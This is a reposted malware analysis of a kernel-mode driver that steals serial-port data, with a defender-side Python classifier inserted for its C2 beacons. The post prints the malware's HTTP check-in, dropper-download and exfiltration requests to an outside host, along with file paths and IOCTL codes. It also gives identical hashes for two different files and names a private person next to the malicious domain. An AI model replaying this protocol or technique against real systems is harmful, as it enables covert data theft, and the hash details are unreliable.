Nytro Posted September 30, 2013

[h=1]Investigation of an interesting kernel mode stealer[/h]

https://twitter.com/artem_i_baranov/status/228409424996352001

About two weeks ago my friend R136a1 from the kernelmode forum came across a dropper that installs a driver in the system. We decided to research it, and starting the analysis was not a mistake...

Initial dropper hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes

At this moment I can say that only one or two vendors identify it as belonging to a malware family. The main purpose of the dropper is to extract the driver from itself and install it in the system. The driver is disguised as a USB driver and is always extracted under the same name, usbhc.sys.

Hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes

One of the strangest things I discovered is that the driver is fully standalone and does not receive commands from user mode. Accordingly, it does not create a device object or a symbolic link for user-mode interaction. My research led me to the conclusion that the driver has one main purpose: stealing data from devices connected to the computer's serial ports and sending it to a remote server...

To steal data from these devices it performs some preparatory operations. First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM, which stores the devices attached to serial ports [devices representing serial ports]. Second, it attaches to all of these devices. After the rootkit has attached its device, the serial device stack has the following form:

The second very interesting thing in this case is that all network communication with the remote server is also implemented inside the driver:
- DGA (Domain Generation Algorithm)
- DNS via UDP (to convert domain names into IPs)
- HTTP-based communication via TCP
- Special communication with the ndisrd.sys driver

To retrieve domains and resolve them to IP addresses, the driver uses the following technique.
First, it looks for the DhcpNameServer parameter of each interface it finds under \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\. Next, it generates domains and queries the DNS service for their status. All further communication goes through the server whose address was obtained via DNS. All domains it polls are listed at the end of the post.

Network communication is completely based on TDI (Transport Device Interface) [see the WDK for its description, or this tutorial: Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject]. Preparing the server connection has the following form (in SDK terms, creating a socket). Next it connects to the remote server:

Internally, the driver describes the socket with this structure:

struct TDI_CONNECTION_INTERNAL {
    PFILE_OBJECT foTransportAddress;
    HANDLE hTransportAddress;
    PVOID foConnection;
    HANDLE hConnection;
    ....
}

After the connection with the server is set up, it can send HTTP requests to it. Requests have the form:

GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: host
Connection: close

Simple communication with the server (roll call) looks like this:

-> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1
   Accept-Language: en
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
   Host: perwadav.org
   Connection: close

<- HTTP/1.1 200 OK
   Date: Mon, 23 Jul 2012 17:13:16 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 20
   Connection: close
   Content-Type: text/html; charset=UTF-8

   SERVERISOK -> server status

After the connection is established, the driver downloads a dropper for ndisrd.sys from the server with the request:

GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1

The os_ver variable has the form n_xp_32 or n_7_32. Basic requests are formed with the function:

Conversation:

The driver saves the dropper to \SystemRoot\System32\kb_random.exe. In my case:
\SystemRoot\System32\kbVOTHBNAU.exe

From the driver:

Downloaded dropper:
SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959
MD5: a93b5454f4492a4a8d971811f2d12b1e
File size: 81805 bytes

After the dropper is downloaded, the driver installs it. Installation is performed in the context of a trusted process, explorer or services (depending on the OS version). The purpose of the downloaded dropper is to install the ndisrd.sys driver. The rootkit driver then opens the ndisrd device. The purpose of the IOCTLs the rootkit sends to NDISRD could not be identified, but here is the list of them:

830020D0
830020D4
830020D8
830020DC
830020C4

As I said before, the main purpose of the rootkit is stealing data from serial devices and sending it to the server. Data theft is performed by registering a completion routine in the Write and Read IRP dispatch functions. The driver registers its device in the chain of serial devices and can see all requests that pass through the chain. The IRP_MJ_READ handler registers a completion routine and calls the next driver on the stack. The completion routine looks like this:

After the data is captured, a special thread wakes up and writes the cached data to a file, \SystemRoot\System32\svlog.log. After the data is written, the thread sets a special event signaling that the data has been written to the file. The thread responsible for sending data from the file to the server:

-> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1
   Accept-Language: en
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
   Host: perwadav.org
   Connection: close

   Data of file

<- HTTP/1.1 200 OK
   Date: Mon, 23 Jul 2012 17:13:16 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 20
   Connection: close
   Content-Type: text/html; charset=UTF-8

   SERVERISOK -> server status

Information about the malicious domain:

This guy's LinkedIn profile: Nikolay Petrachkov | LinkedIn.
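A defender-side classifier for the three request shapes described above (roll call, dropper download with f=os_ver, and exfiltration with a=), added here as an example; it is not part of the original post or of the malware. It assumes the raw HTTP request text has already been captured (for example from a proxy log), and it treats the 8-letter .com/.org host pattern of the listed domains only as a heuristic:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request-line shape from the write-up:
#   GET /srv.php?&id=<uniqueID>&mark=METKA[&f=<os_ver> | &a=] HTTP/1.1
REQ_LINE = re.compile(r"^GET (/srv\.php\?\S*) HTTP/1\.[01]$")
# Heuristic (assumption): every C2 domain in the write-up is 8 lowercase letters under .com/.org.
DGA_HOST = re.compile(r"^[a-z]{8}\.(?:com|org)$")

def parse_beacon(raw_request):
    """Return a dict describing a usbhc.sys beacon, or None if the request is not one."""
    lines = raw_request.strip().splitlines()
    m = REQ_LINE.match(lines[0].strip()) if lines else None
    if not m:
        return None
    # keep_blank_values so the empty 'a=' of the exfiltration request survives
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    bot_id = params.get("id", [""])[0]
    if not bot_id or params.get("mark", [""])[0] != "METKA":
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    if "f" in params:
        kind = "dropper_download"   # f=<os_ver>: fetching the ndisrd.sys dropper
    elif "a" in params:
        kind = "exfiltration"       # a=: body carries the captured svlog.log data
    else:
        kind = "rollcall"           # plain check-in, server answers SERVERISOK
    host = headers.get("host", "")
    return {"id": bot_id, "kind": kind, "os_ver": params.get("f", [None])[0],
            "host": host, "dga_like_host": bool(DGA_HOST.match(host))}

def scan_requests(requests):
    """Return (index, beacon) pairs for every request matching the C2 protocol."""
    return [(i, b) for i, r in enumerate(requests) if (b := parse_beacon(r)) is not None]

# Constructed samples: the first three mirror the write-up's requests, the last two are benign.
UA = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
TAIL = UA + "Host: perwadav.org\r\nConnection: close\r\n"
SAMPLES = [
    "GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1\r\nAccept-Language: en\r\n" + TAIL,
    "GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&f=n_xp_32 HTTP/1.1\r\n" + TAIL,
    "GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1\r\n" + TAIL + "\r\n<captured data>",
    "GET /index.php?id=1&mark=METKA HTTP/1.1\r\nHost: www.example.com\r\n",
    "GET /srv.php?&id=GOG73FRHOBFI&mark=OTHER HTTP/1.1\r\nHost: www.example.com\r\n",
]
```

Running scan_requests(SAMPLES) flags only the first three samples; the constant mark=METKA and the fixed /srv.php path are the most stable parts of the protocol to alert on, while the host check only adds confidence.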
You can download the paper about the dropper by R136a1 here: http://artemonsecurity.com/research_of_unk_malware.pdf

List of domains:

posted by https://twitter.com/artem_i_baranov
Posted 26th July 2012 by Artem
Source: Security/malware blog: Investigation an interesting kernel mode stealer